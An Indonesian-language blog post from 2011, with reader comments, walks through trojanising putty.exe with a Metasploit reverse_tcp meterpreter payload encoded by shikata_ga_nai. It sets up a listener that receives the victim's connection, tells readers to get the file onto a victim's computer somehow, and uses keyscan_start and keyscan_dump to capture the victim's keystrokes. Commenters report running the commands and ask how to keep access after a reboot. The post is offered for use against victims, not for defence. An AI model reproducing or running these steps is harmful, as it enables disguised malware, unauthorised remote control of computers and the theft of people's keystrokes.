Tuesday, September 20, 2011

Membuat backdoor dengan x86/shikata_ga_nai

Kalau agan-agan berpikir Windows 7 itu ngak bisa diexploit, agan salah besar karena ada banyak cara yang dilakukan untuk bisa melakukan exploitasi terhadap sebuah Operasi Sistem, sekarang kita akan melakukan exploitasi terhadap Windows Xp dan 7, ditambah lagi cara untuk melakukan rekaman terhadap ketikan keyboard(keylogger) melalui meterpreter.Check it Out.

1. Cari file yang akan kalian gunakan untuk memancing target mengeksekusi file tersebut. Disini ane menggunakan file putty.exe, jadi download dulu y.

root@bt:~# wget http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe


2. Infeksi file yang akan dieksekusi dengan payload exploit.rubah nama putty.exe manjadi putty_pro.exe dan gunakan exploit x86/shikata_ga_nai,buat yang master udah ngertilah.

root@bt:/# cd /pentest/exploits/framework
root@bt:/pentest/exploits/framework# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.125 R |./msfencode -t exe -x /tmp/putty.exe -k -o /tmp/putty_pro.exe -e x86/shikata_ga_nai -c 5


3. Jalankan Metasploit dan buat listener agar ketika file yang kita buat diatas dieksekusi meterpreter akan langsung terbuka.

msfconsole 
use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp
set lhost IP_KITA
exploit


4. Entah bagaimana caranya copy file yang sudah diinfeksi diatas kedalam komputer korban,entah bagaimana caranya[usaha itu perlu bro].Ketika file dieksekusi maka secara otomatis meterpreter akan terbuka.sekarang terserah kalian mau diapakan komputer itu.



note : komputer kita dengan target akan hilang koneksi ketika file yang dieksekusi ditutup[dicobain biar tau].


5. Plus dari ane adalah merecord semua ketikan dari keyboard.Gunakan perintah keyscan_start dan untuk melihat hasil ketikan dari korban gunakan keyscan_dump. Pawned !

Windows XP :



Windows 7 :



Semoga tutorial ini bisa membantu temen-temen yang kesulitan mencari tutorial.

kontraktor acp

Author & Editor

Has laoreet percipitur ad. Vide interesset in mei, no his legimus verterem. Et nostrum imperdiet appellantur usu, mnesarchum referrentur id vim.

4 comments:

  1. exploit x86/shikata_ga_nai cara menggunakannya gimana bro...???

    ReplyDelete
  2. Misalnya kita mau melakukan exploitasi terhadap windows 7, kita cari file apa saja yang bisa diinjeksi exploit x86/shikata_ga_nai, kemudian ketika sikorban menjalankan aplikasi yang sudah kita injeksi maka listener akan bereaksi terhadap aplikasi yang telah diinjeksi tersebut, dan akan membuat akses kepada komputer sikorban.

    ReplyDelete
  3. bang octo kok gw pas praktekin ini ga bisa bang?di terminal tampilannya :

    ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.125 R |./msfencode -t exe -x /tmp/putty.exe -k -o /tmp/putty_pro.exe -e x86/shikata_ga_nai -c 5
    [*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)

    [*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)

    [*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)

    [*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)

    [*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)

    [-] x86/shikata_ga_nai failed: No such file or directory - /tmp/putty.exe
    [-] No encoders succeeded.


    mohon pencerahannya bang

    ReplyDelete
  4. gan..ini kan cuma pas sudah dijalanka sama victim...bagaimana caranya setelah victim restart bisa kita exploit lagi..apa kita psang backdoor,,gimana caranya tu gan

    http://arminaven.blogspot.com/

    ReplyDelete

Silahkan meninggalkan pesan jika artikel diatas membantu anda,:)

 
biz.